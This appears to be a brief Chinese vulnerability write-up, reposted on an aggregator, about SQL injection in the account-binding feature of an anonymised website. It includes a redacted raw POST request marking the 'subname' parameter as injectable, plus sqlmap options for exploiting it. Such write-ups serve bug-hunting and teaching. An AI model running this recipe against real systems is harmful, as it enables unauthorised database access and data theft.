严重XXXX网SQL注入

Posted huim

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了严重XXXX网SQL注入相关的知识,希望对你有一定的参考价值。

RANK  80

金币    100

数据包

POST xxxx/sendapp HTTP/1.1
Host: aaa.bbb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: XXXX
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 21
Cookie: XXXXX
DNT: 1
Connection: close

subname=admin*&group=1

 

参数subname可注入,直接将数据包存为txt ,-r ,--no-cast --threads=10就好了

用了很久的no-cast,还没有细查过什么意思。有一句解释是这样的:

默认情况下,sqlmap榨取数据时会将所有结果转换为字符串,并用空格替换NULL结果

老版本mysql数据库对此提取不到数据,因而需要该参数取消这个默认处理方式

 

注入点,还是在于扫描器爬虫的深度和广度、模拟登录载入cookie、token等

后来查看了一下,原来位置是在 账号管理功能模块的绑定账号,即A账号绑定子账号B,B的名字可注入。这个点,确实一般的扫描器会扫么是个问题。挖洞还是在于去钻吧。

 












以上是关于严重XXXX网SQL注入的主要内容,如果未能解决你的问题,请参考以下文章

SQL注入语法

SQl注入手法

SQL一般注入

SQL注入小结

SQL注入科普

Sql注入-1:sql注入基本原理